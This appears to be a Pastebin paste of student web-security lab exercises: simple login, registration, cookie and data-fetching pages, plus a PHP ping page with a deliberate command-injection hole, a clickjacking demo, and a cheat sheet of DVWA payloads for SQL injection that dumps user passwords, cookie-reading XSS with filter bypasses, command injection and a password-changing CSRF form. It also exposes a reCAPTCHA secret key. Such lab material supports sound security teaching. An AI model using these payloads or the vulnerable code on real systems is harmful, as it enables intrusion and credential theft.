API tools faq
paste
Advertisement
war99859

Untitled

war99859
Oct 29th, 2023 (edited)
222
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 10.15 KB | None | 0 0
raw download clone embed print report
  1. Experiments:
  2. <!DOCTYPE html>
  3. <html>
  4. <head>
  5.     <script src="https://www.google.com/recaptcha/api.js"></script>
  6. </head>
  7. <body>
  8.     <form action="submit.php">
  9.         <input type="text" name="u" placeholder="Username" required>
  10.         <input type="password" name="p" placeholder="Password" required>
  11.         <input type="hidden" name="h1" value="v1">
  12.         <div class="g-recaptcha" data-sitekey="YOUR_KEY"></div>
  13.         <input type="submit">
  14.     </form>
  15. </body>
  16. </html>
  17.  
  18. Exp_1:
  19. Index.html:
  20. <!DOCTYPE html>
  21. <html>
  22. <head>
  23. <title>Exp_1</title>
  24. </head>
  25. <body>
  26. <center>
  27. <h1>Amrita Cyber Nation</h1>
  28. <form action="process-login.php" method="post">
  29. <label>Username:</label>
  30. <input type="text" required><br><br>
  31.  
  32. <input type="hidden" name="registration_type" value="Hidden">
  33. <label>Password:</label>
  34. <input type="password" required><br><br>
  35. <div class="g-recaptcha"
  36. data-sitekey="6Lfdq9ooAAAAAPnQmjE95iUwPlUcCIbgnfW_P81x"></div><br>
  37. <input type="submit" value="Login">
  38. </form>
  39. </center>
  40. <!-- reCAPTCHA script -->
  41. <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  42. </body>
  43. </html>
  44.  
  45. Process-login.php:
  46. <?php
  47. //secret-key
  48. $secretKey = "6Lfdq9ooAAAAACb8KNJnZeV1uy4zJuSoFEwcVniT";
  49. if (!isset($_POST['g-recaptcha-response']) || empty($_POST['g-recaptcha-response'])) { exit("Captcha verification failed.");}
  50.  
  51. //api-keyaddress
  52. $response = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$secretKey&respons e={$_POST['g-recaptcha-response']}");
  53. $isVerified = json_decode($response, true)["success"];
  54. echo $isVerified ? "Login successful!": "Please complete the captcha verification.";
  55. ?>
  56.  
  57. Exp_2:
  58.  
  59. index.html:
  60. <!DOCTYPE html>
  61. <html>
  62. <head>
  63. <title>Registration</title>
  64. </head>
  65. <body>
  66. <h1>Amrita Cyber Nation Registration</h1>
  67. <form autocomplete="off">
  68. <input type="text" name="username" placeholder="Username" autocomplete="off"><br>
  69. <input type="email" name="email" placeholder="Email" autocomplete="off"><br>
  70. <input type="password" name="password" placeholder="Password" autocomplete="off"><br>
  71. <input type="submit" value="Register">
  72. </form>
  73. </body>
  74. </html>
  75.  
  76. Exp_3:
  77. Index.html:
  78. <html>
  79. <head>
  80. <title>exp_3_Bank Login</title>
  81. </head>
  82. <body>
  83. <h1>Bank Login</h1>
  84. <form id="bankLoginForm">
  85. <input type="text" placeholder="Username"><br>
  86. <input type="password" placeholder="Password"><br>
  87. <input type="button" value="Login" onclick="openBankPortal()">
  88. </form>
  89.  
  90. <script>
  91. function openBankPortal() { window.open('bank-portal.html', 'BankPortal',
  92. 'width=600,height=400,location=no,menubar=no,status=no,toolbar=no');
  93. }
  94. </script>
  95. </body>
  96. </html>
  97.  
  98. Bank-portal.html:
  99. <html>
  100. <head>
  101. </head>
  102. <body>
  103. <div class="container">
  104. <h2>Welcome to the Bank Portal</h2>
  105. <p>Your current balance is: $10,000</p>
  106. </div>
  107. </body>
  108. </html>
  109.  
  110.  
  111. Exp_4:
  112. index.html
  113. <html>
  114. <head>
  115. <title>Exp_4</title>
  116. <script>
  117. function preventActions(e) { e.preventDefault();
  118. alert('Copy, Paste, and Right Click are not allowed.');
  119. }
  120. </script>
  121. </head>
  122.  
  123. <body oncontextmenu="preventActions(event)">
  124. <center>
  125. <h1>Bank Tranfer</h1>
  126. <form>
  127. <label for="fromAccount">From Account:</label>
  128. <input type="text" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
  129. <label for="toAccount">To Account:</label>
  130. <input type="text" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
  131. <label for="amount">Amount:</label>
  132. <input type="text" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
  133. <input type="submit" value="Transfer">
  134. </form>
  135. </center>
  136. </body>
  137. </html>
  138.  
  139. Exp_5:
  140. Index.html:
  141. <html>
  142. <head>
  143. <script>
  144. function validateLocation() { navigator.geolocation.getCurrentPosition(position => {
  145.  
  146. fetch(`https://api.bigdatacloud.net/data/reverse-geocode-client?latitude=${position.coords.latitud e}&longitude=${position.coords.longitude}`)
  147. .then(res => res.json())
  148. .then(data => alert(data.countryName === document.getElementById('country').value ? 'Success' : 'Incorrect'));});
  149. }
  150. </script>
  151. </head>
  152.  
  153. <body>
  154. <h1>Country Validation</h1>
  155. <form onsubmit="event.preventDefault(); validateLocation();">
  156. <label>Country:</label>
  157. <select id="country">
  158. <option value="India">India</option>
  159. <option value="USA">USA</option>
  160. <option value="Japan">Japan</option>
  161. </select>
  162. <input type="submit" value="Verify">
  163. </form>
  164. </body>
  165. </html>
  166.  
  167. Exp_6:
  168. Index.html:
  169. <!DOCTYPE html>
  170. <html>
  171. <head>
  172.     <title>Banking Sign-In</title>
  173. </head>
  174. <body>
  175.     <form method="POST" action="">
  176.         <label for="username">Username</label><br>
  177.         <input type="text" name="username" id="username"><br>
  178.         <label for="email">Email</label><br>
  179.         <input type="email" name="email" id="email"><br>
  180.         <button type="submit">Register</button>
  181.     </form>
  182.  
  183.     <?php
  184.    if ($_SERVER["REQUEST_METHOD"] == "POST") {
  185.        echo "<h2>VERIFICATION PURPOSE</h2>";
  186.         $username = $_POST['username'];
  187.         $email = $_POST['email'];
  188.         echo "Username: $username <br>";
  189.         echo "Email: $email";
  190.     }
  191.     ?>
  192. </body>
  193. </html>
  194.  
  195.  
  196. Exp_7:
  197.  
  198. Exp_8:
  199. Index.html:
  200. <html>
  201. <head>
  202. <script>
  203. function fetchMarks() {
  204. const name = document.getElementById('students').value; const xhttp = new XMLHttpRequest();
  205. xhttp.onload = function() {
  206. const student = Array.from(this.responseXML.querySelectorAll('student')).find(s => s.querySelector('name').textContent === name);
  207. if (student) {
  208. const maths = student.querySelector('maths').textContent; const science = student.querySelector('science').textContent; const history = student.querySelector('history').textContent;
  209.  
  210. document.getElementById('output').innerHTML = `Maths: ${maths}<br>Science:
  211. ${science}<br>History: ${history}`;
  212. }
  213. };
  214. xhttp.open("GET", "students.xml"); xhttp.send();
  215. }
  216. </script>
  217. </head>
  218.  
  219. <body>
  220. <h1>Display Student Marks</h1>
  221. <select id="students">
  222. <option>John Doe</option>
  223. <option>Jane Smith</option>
  224. </select>
  225.  
  226. <button onclick="fetchMarks()">Display Marks</button>
  227. <div id="output"></div>
  228. </body>
  229. </html>
  230.  
  231. Students.xml:
  232. <?xml version="1.0" encoding="UTF-8"?>
  233. <students>
  234. <student>
  235. <name>John Doe</name>
  236. <maths>85</maths>
  237. <science>88</science>
  238. <history>90</history>
  239. </student>
  240. <student>
  241. <name>Jane Smith</name>
  242. <maths>78</maths>
  243. <science>82</science>
  244. <history>86</history>
  245. </student>
  246. </students>
  247.  
  248. Exp_9: Index.html:
  249. <html>
  250. <head>
  251. <script>
  252.  
  253. function displayDetails() { fetch('students.json')
  254. .then(response => response.json())
  255. .then(data => { const details = `
  256. Name: ${data.name}<br> Age: ${data.age}<br> Grade: ${data.grade}
  257. `;
  258. document.getElementById('studentDetails').innerHTML = details;
  259. });
  260. }
  261. </script>
  262. </head>
  263. <body>
  264. <h1>Fetch From Json</h1><br>
  265. <button onclick="displayDetails()">Display Student Details</button><br><br>
  266. <div id="studentDetails"></div>
  267.  
  268. </body>
  269. </html>
  270.  
  271. Students.json:
  272. {
  273. "name": "John Doe", "age": 21,
  274. "grade": "B"
  275. }
  276.  
  277. Exp_10:
  278. Cookie.php
  279. <?php if(isset($_GET['action'])) {
  280. switch ($_GET['action']) { case 'set':
  281. setcookie("user", "John Doe", time() + 3600); echo "Cookie set!<br>";
  282. break;
  283.  
  284. case 'get':
  285. echo isset($_COOKIE["user"]) ? "Cookie: " . $_COOKIE["user"] . "<br>" : "Cookie not set.<br>";
  286. break;
  287.  
  288. case 'modify':
  289. setcookie("user", "Jane Smith", time() + 3600); echo "Cookie modified!<br>";
  290. break;
  291.  
  292. case 'delete':
  293. setcookie("user", "", time() - 3600); echo "Cookie deleted!<br>"; break;
  294. }
  295. }
  296. ?>
  297. <h1>working with cookies</h1>
  298. <a href="?action=set">Set Cookie</a> |
  299. <a href="?action=get">Get Cookie</a> |
  300. <a href="?action=modify">Modify Cookie</a> |
  301. <a href="?action=delete">Delete Cookie</a>
  302.  
  303. Exp_14:
  304. <?php
  305. if (isset($_GET['ip'])) {
  306. system("ping " . $_GET['ip']);
  307. }
  308. ?>
  309.  
  310. <form method="GET">
  311. Enter the IP to perform ping: <input type="text" name="ip">
  312. <input type="submit" value="View File">
  313. </form>
  314.  
  315. Exp_15: Index.html
  316. <html>
  317. <head>
  318. <style>
  319. body {
  320. display: flex;
  321. justify-content: center; align-items: center; height: 100vh; position: relative;
  322. }
  323.  
  324. iframe {
  325. position: absolute; top: 50%;
  326. left: 50%;
  327. transform: translate(-50%, -50%);
  328. opacity: 0.1; /* Makes the iframe barely visible */ z-index: 2;
  329. }
  330. button {
  331. font-size: 24px; padding: 15px 30px; z-index: 1;
  332. }
  333. </style>
  334. </head>
  335. <body>
  336. <iframe src="target.html" width="200" height="100"></iframe>
  337. <button>Close the advertisement</button>
  338. </body>
  339. </html>
  340.  
  341. Target.html:
  342. <!DOCTYPE html>
  343. <html lang="en">
  344. <head>
  345. <meta charset="UTF-8">
  346. <title>Target Page</title>
  347. <style>
  348. body {
  349. display: flex;
  350. justify-content: center; align-items: center; height: 100vh;
  351. }
  352. button {
  353. font-size: 24px; padding: 15px 30px;
  354. }
  355. </style>
  356. </head>
  357. <body>
  358. <button onclick="alert('Data compromised')">HACK</button>
  359. </body>
  360. </html>
  361.  
  362.  
  363. 11. SQL
  364. a. Always True Scenario -
  365. %' or '1'='1
  366.  
  367. b. Display Database Version, User, Name -
  368. %' or 0=0 union select null, version() #
  369. %' or 0=0 union select null, user() #
  370. %' or 0=0 union select null, database() #
  371.  
  372. c. Display all the table field -
  373. 'union select null,table_name from information_schema.tables#
  374.  
  375. d. Display all the column's field -
  376.  'union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  377.  
  378.  
  379. 12. XSS
  380. a. Reflected XSS
  381. <script>alert(document.cookie)</script>
  382. <Script>alert(document.cookie)</Script>
  383. <img src = x onerror =alert(document.cookie)>
  384.  
  385. b. Stored XSS
  386. <script>alert(document.cookie)</script>
  387. <Script>alert(document.cookie)</Script>
  388. <svg/onload=alert("hackersid")>
  389.  
  390. c. DOM-based XSS
  391. <script>alert(document.cookie)</script>
  392. </select><img src=x onerror=alert('XSS')>
  393. & </select> <Svg onload=alert("hi")>
  394.  
  395. reflected xss
  396. low
  397. <script> alert("1567")</script>
  398. medium
  399. <Script> alert("1567")</Script>
  400. high
  401. <img src=x onerror=alert("12345")>
  402.  
  403. stored xss
  404. low
  405. <script> alert("1567")</script>
  406. medium
  407. <Script> alert("1567")</Script>
  408. high
  409. <svg/onload=alert("hackersid")>
  410.  
  411.  
  412. 14. Command Injuction
  413. 127.0.01 | tasklist
  414. 127.0.01 | wmic bios
  415. 127.0.01 | whoami
  416.  
  417.  
  418. 13. CSRF
  419. <form action="http://localhost:8080/dvwa/vulnerabilities/csrf/?" method="GET">
  420.             <h1> Click here to get 100Rs </h1>
  421.             <input type="hidden" AUTOCOMPLETE="off" name="password_new" value="7814">
  422.             <input type="hidden" AUTOCOMPLETE="off" name="password_conf" value="7814">
  423.             <input type="submit" value="Submit" name="Change">
  424.         </form>
  425.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!